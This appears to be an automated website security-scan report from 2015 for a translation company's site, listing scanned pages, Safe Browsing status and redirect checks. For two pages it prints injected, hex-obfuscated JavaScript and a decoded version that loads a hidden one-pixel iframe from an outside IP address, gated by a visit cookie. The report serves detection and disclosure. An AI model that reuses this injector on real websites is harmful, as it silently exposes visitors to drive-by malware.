Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=translation.sercominter.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://translation.sercominter.com/ | 200 OK Content-Length: 19016 Content-Type: text/html | clean |
http://translation.sercominter.com/index_en.html | 200 OK Content-Length: 18996 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en.html | 200 OK Content-Length: 29057 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e86842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e86843c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e86843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e86843c8182877a733c707d807273802e4b2e353e35491b182e86843c8182877a733c7673777576822e4b2e353f Decoded script: String String function zzzfff() { var xv = document.createElement('iframe'); xv.src = 'http://101.110.168.104/8pPtHKXF.php'; xv.style.position = 'absolute'; xv.style.border = '0'; xv.style.height = '1px'; xv.style.width = '1px'; xv.style.left = '1px'; xv.style.top = '1px'; if (!document.getElementById('xv')) { document.write('<div id=\'xv\'></div>'); document.getElementById('xv').appendChild(x ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://translation.sercominter.com/empresa_en_files/jwplayer.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/test404page.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/video-embed-rewriter.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/disclaim-element.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/graph-calc.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/jquery.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/presupuesto_en.htm | 200 OK Content-Length: 28042 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e86842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e86843c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e86843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e86843c8182877a733c707d807273802e4b2e353e35491b182e86843c8182877a733c7673777576822e4b2e353f Decoded script: String String function zzzfff() { var xv = document.createElement('iframe'); xv.src = 'http://101.110.168.104/8pPtHKXF.php'; xv.style.position = 'absolute'; xv.style.border = '0'; xv.style.height = '1px'; xv.style.width = '1px'; xv.style.left = '1px'; xv.style.top = '1px'; if (!document.getElementById('xv')) { document.write('<div id=\'xv\'></div>'); document.getElementById('xv').appendChild(x ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://translation.sercominter.com/presupuesto.cfm-40idioma=en | 200 OK Content-Length: 25416 Content-Type: text/plain | clean |
http://translation.sercominter.com/traductores.cfm-40idioma=en | 200 OK Content-Length: 17872 Content-Type: text/plain | clean |
http://translation.sercominter.com/clientes.cfm-40idioma=en | 200 OK Content-Length: 16792 Content-Type: text/plain | clean |
http://translation.sercominter.com/traductores_en.htm | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/enlaces_en.html | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: translation.sercominter.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 08:17:38 GMT
Accept-Ranges: bytes
ETag: "13bc0ee-4a48-90f92a40"
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 mod_python/3.2.10 Python/2.4.4 PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Content-Length: 19016
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Mon, 13 Jan 2014 14:05:21 GMT
...19016 bytes of data.
GET / HTTP/1.1
Host: translation.sercominter.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 08:17:38 GMT
Accept-Ranges: bytes
ETag: "13bc0ee-4a48-90f92a40"
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 mod_python/3.2.10 Python/2.4.4 PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Content-Length: 19016
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Mon, 13 Jan 2014 14:05:21 GMT
...19016 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: translation.sercominter.com
Referer: http://www.google.com/search?q=translation.sercominter.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: translation.sercominter.com
Referer: http://www.google.com/search?q=translation.sercominter.com
Result:
The result is similar to the first query. There are no suspicious redirects found.